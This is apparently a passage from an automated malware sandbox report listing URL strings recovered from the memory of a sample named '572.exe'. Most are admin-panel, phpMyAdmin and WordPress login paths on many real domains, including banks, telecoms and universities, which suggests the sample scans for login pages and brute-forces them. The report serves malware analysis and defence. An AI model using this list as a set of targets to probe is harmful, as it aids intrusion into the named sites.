                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/index.php.
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/administrator/index.phpex.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://us04web.zoom.us/phpmyadmin/:443I
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/PhpMyAdmin/y
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/administrator/trator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://v.xsanime.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/C.
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/admin
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/admin.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/admineampowered.com
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/O
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.phpJ
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.phpn
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.phpq
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/administrator/index.phpu
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/phpMyAdmin/5
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/wp-admin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/wp-admin/hp2
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ventas.officeinsumos.com.ar/wp-admin/~)D
                Source: 572.exe, 00000009.00000003.4304769446.00000000401FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/admin
                Source: 572.exe, 00000009.00000003.4304769446.00000000401FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/admini
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/administrator/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/administrator/index.php
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/administrator/index.phpQ$
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vidcorn.tv/administrator/ount.live.com252587
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://virtuadopt.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://virtuadopt.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://virtuadopt.com/administrator/index.phpe
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://virtuadopt.com/administrator/index.phpom26
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/PhpMyAdmin/d)t
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/administrator/net
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://warriorplus.com/phpmyadmin/%
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.00000000392B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww1.chainmine.io/administrator/?usid=27&utid=4923801068
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.chainmine.io/administrator/index.php?usid=27&utid=4923801494
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.chainmine.io/administrator/index.php?usid=27&utid=4923801494Encoding:
                Source: 572.exe, 00000009.00000003.4308489219.0000000006196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.followerstiktok.xyz/phpmyadmin/?sub1=20240205-2214-549f-9760-a2fba92ef7f3
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.allaboutcookies.org
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.analvids.com/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.analvids.com/administrator/-
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/fgts/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/mapa/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/pj/pj_comercial/mp/promocoes_comerciais/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/seguranca/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/seguranca/politica_privacidade.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/seguranca/termos_de_uso.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/voce/contribuicao_sindical/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/voce/social/beneficios/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/voce/social/cadastro/index.asp
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.caixa.gov.br/voce/social/transferencia/index.asp
                Source: FE8B.exe, 00000007.00000002.2646571313.0000000000A88000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.chilkatsoft.comN
                Source: 572.exe, 00000009.00000003.4306089773.000000004E742000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.claro.com.pe/
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9CF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                Source: 1EB9.tmpString found in binary or memory: http://www.innosetup.com/
                Source: 572.exe, 00000009.00000003.4304769446.00000000402DA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.miuniversidad.es).
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL
                Source: 1EB9.tmpString found in binary or memory: http://www.remobjects.com/ps
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.steampowered.com/steamworks/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/about
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 572.exe, 00000009.00000003.4390567048.0000000039199000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D818000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yellosa.co.za/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yellosa.co.za/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/pma/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-admin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-admin/O
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4327514305.000000004D9A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-login.php
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-login.php)
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-login.php/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.personas.santander.com.ar/wp-login.php/index.php#
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304582370.00000000404E5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/-
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.00000000405D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039194000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/u
                Source: 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/v
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.00000000405D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039194000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/&
                Source: 572.exe, 00000009.00000003.4401816982.00000000392B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/administrator/
                Source: 572.exe, 00000009.00000003.4401816982.00000000392B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/administrator/-
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/PhpMyAdmin/Ix
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/administrator/L
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/administrator/g
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/phpMyAdmin/%CN
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yellosa.co.za/phpmyadmin/myadmin/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zarkana2.ro/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zarkana2.ro/administrator/K
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/administrator/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/administrator/index.php
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/administrator/index.php0
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/administrator/index.php995
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/phpMyAdmin/Qu
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/phpmyadmin/26
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zuhauseplus.vodafone.de/phpmyadmin/my
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3fba-180-252-166-236.ngrok.io/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3fba-180-252-166-236.ngrok.io/phpmyadmin/.com
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://about.imvu.com/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://about.imvu.com/contact
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://about.imvu.com/mobile/
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9A0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://academico.um.edu.mx/academico/administrator/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://academico.um.edu.mx/academico/administrator/M
                Source: 572.exe, 00000009.00000003.4308489219.0000000006181000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://academico.um.edu.mx/academico/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://academico.um.edu.mx/academico/phpmyadmin/5ox
                Source: 572.exe, 00000009.00000003.4337138614.000000004DAE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.booking.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.000000000622B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.booking.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.booking.com/phpmyadmin/6d7
                Source: 572.exe, 00000009.00000003.4224252877.00000000640D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/administrator/ministrator/F
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/administrator/or/nistrator/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/error.aspx?e=404
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/phpmyadmin/
